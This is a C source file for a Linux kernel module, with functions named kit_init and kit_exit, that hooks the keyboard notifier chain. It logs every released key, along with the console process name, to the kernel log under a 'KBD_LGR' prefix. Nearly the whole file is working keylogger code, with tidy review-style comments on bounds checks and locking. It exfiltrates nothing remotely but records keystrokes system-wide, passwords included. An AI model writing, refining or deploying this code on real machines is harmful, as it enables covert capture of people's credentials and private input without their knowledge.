#include <linux/module.h>
#include <linux/init.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/pid.h>
#include <linux/tty.h>
#include <linux/kd.h>
#include <linux/console_struct.h>
// Keyboard hook
#include <linux/keyboard.h>
// Size in bytes of the per-event translation buffer (buff) in key_hook().
#define BUFLEN 16
// Declares the module's license string as "GPL".
MODULE_LICENSE("GPL");
/*
 * Display string for each 7-bit ASCII code, indexed by the code itself.
 *
 * Control codes (0x01-0x1f) and 0x7f are spelled as bracketed names such as
 * "<ESC>"; index 0 is the empty string; every other entry is the character
 * as a one-character string. The table holds exactly 128 entries, so only
 * indices 0-127 are valid.
 *
 * Taken from: https://github.com/enaudon/abide/
 */
char *ascii[128] = {
	/* 0x00 - 0x07 */
	"", "<SOH>", "<STX>", "<ETX>", "<EOT>", "<ENQ>", "<ACK>", "<BEL>",
	/* 0x08 - 0x0f */
	"<BS>", "<TAB>", "<LF>", "<VT>", "<FF>", "<CR>", "<SO>", "<SI>",
	/* 0x10 - 0x17 */
	"<DLE>", "<DC1>", "<DC2>", "<DC3>", "<DC4>", "<NAK>", "<SYN>", "<ETB>",
	/* 0x18 - 0x1f */
	"<CAN>", "<EM>", "<SUB>", "<ESC>", "<FS>", "<GS>", "<RS>", "<US>",
	/* 0x20 - 0x27 */
	" ", "!", "\"", "#", "$", "%", "&", "'",
	/* 0x28 - 0x2f */
	"(", ")", "*", "+", ",", "-", ".", "/",
	/* 0x30 - 0x37 */
	"0", "1", "2", "3", "4", "5", "6", "7",
	/* 0x38 - 0x3f */
	"8", "9", ":", ";", "<", "=", ">", "?",
	/* 0x40 - 0x47 */
	"@", "A", "B", "C", "D", "E", "F", "G",
	/* 0x48 - 0x4f */
	"H", "I", "J", "K", "L", "M", "N", "O",
	/* 0x50 - 0x57 */
	"P", "Q", "R", "S", "T", "U", "V", "W",
	/* 0x58 - 0x5f */
	"X", "Y", "Z", "[", "\\", "]", "^", "_",
	/* 0x60 - 0x67 */
	"`", "a", "b", "c", "d", "e", "f", "g",
	/* 0x68 - 0x6f */
	"h", "i", "j", "k", "l", "m", "n", "o",
	/* 0x70 - 0x77 */
	"p", "q", "r", "s", "t", "u", "v", "w",
	/* 0x78 - 0x7f */
	"x", "y", "z", "{", "|", "}", "~", "<DEL>"
};
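/*
 * key_hook - keyboard notifier callback that writes released keys to the
 * kernel log.
 *
 * @nblock: notifier block the callback was registered through (unused).
 * @code:   notifier event code (unused; events are filtered on
 *          param->value only).
 * @_param: the struct keyboard_notifier_param for this event.
 *
 * For each key-release event that translates to a printable string, one
 * KERN_INFO line of the form "KBD_LGR\t<comm>: <key>" is emitted with
 * printk(), where <comm> is the command name of the task found through the
 * console's vt_pid. The fixed "KBD_LGR" prefix in the kernel log is the
 * observable trace this callback leaves on a host.
 *
 * Return: always NOTIFY_OK, so the event continues down the notifier chain.
 */
int key_hook(struct notifier_block *nblock, unsigned long code, void *_param)
{
	struct keyboard_notifier_param *param = _param;
	/* High byte and low byte of the event value. */
	unsigned char type = param->value >> 8;
	unsigned char val = param->value & 0x00ff;
	struct task_struct *task;
	/* Zero-initialised so an untranslated event leaves an empty string. */
	char buff[BUFLEN] = "";
	/*
	 * Zero-initialised: when no task is found for vt_pid the printk()
	 * below must not read uninitialised stack bytes as a string.
	 */
	char proc_name[TASK_COMM_LEN] = "";

	/* Only key-release events are handled. */
	if (param->down)
		return NOTIFY_OK;

	/*
	 * Resolve the console's vt_pid to a task to obtain its command name.
	 * NOTE(review): pid_task() expects the caller to hold the RCU read
	 * lock; presumably the notifier chain provides it here - confirm.
	 */
	task = pid_task(param->vc->vt_pid, PIDTYPE_PID);
	if (task != NULL)
		strlcpy(proc_name, task->comm, TASK_COMM_LEN);

	/* Backspace and delete first, then the table-driven characters. */
	if (param->value == 0xf07f) {
		strlcpy(buff, "[BS]", BUFLEN);
	} else if (param->value == 0xf116) {
		strlcpy(buff, "[DEL]", BUFLEN);
	} else if ((type == 0xfb || type == 0xf0) &&
		   val < sizeof(ascii) / sizeof(ascii[0])) {
		/*
		 * val is a full byte (0-255) but ascii[] has 128 entries;
		 * the bound check prevents reading past the end of the table.
		 */
		strlcpy(buff, ascii[val], BUFLEN);
	}

	/*
	 * Nothing translated, or the translation starts with '<' (the
	 * bracketed control-code names and the literal "<" entry): skip.
	 */
	if (buff[0] == '\0' || buff[0] == '<')
		return NOTIFY_OK;

	printk(KERN_INFO "KBD_LGR\t%s: %s\n", proc_name, buff);
	return NOTIFY_OK;
}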
/*
 * Notifier block passed to register_keyboard_notifier() and
 * unregister_keyboard_notifier(); its callback is key_hook().
 */
static struct notifier_block keyboard_nb = {
	.notifier_call = key_hook,
};
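/*
 * kit_init - module load handler.
 *
 * Logs "Module Init!" at KERN_INFO and registers keyboard_nb on the keyboard
 * notifier chain, which makes key_hook() run for keyboard events.
 *
 * Return: the result of register_keyboard_notifier(), so a failed
 * registration fails the module load instead of being ignored (kit_exit()
 * would otherwise unregister a block that was never registered).
 */
static int kit_init(void)
{
	printk(KERN_INFO "Module Init!\n");

	return register_keyboard_notifier(&keyboard_nb);
}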
/*
 * kit_exit - module unload handler.
 *
 * Logs "Module Exit!" at KERN_INFO, then removes keyboard_nb from the
 * keyboard notifier chain so key_hook() is no longer called.
 */
static void kit_exit(void)
{
	printk(KERN_INFO "Module Exit!\n");

	unregister_keyboard_notifier(&keyboard_nb);
}
// Run kit_init() when the module is loaded and kit_exit() when it is removed.
module_init(kit_init);
module_exit(kit_exit);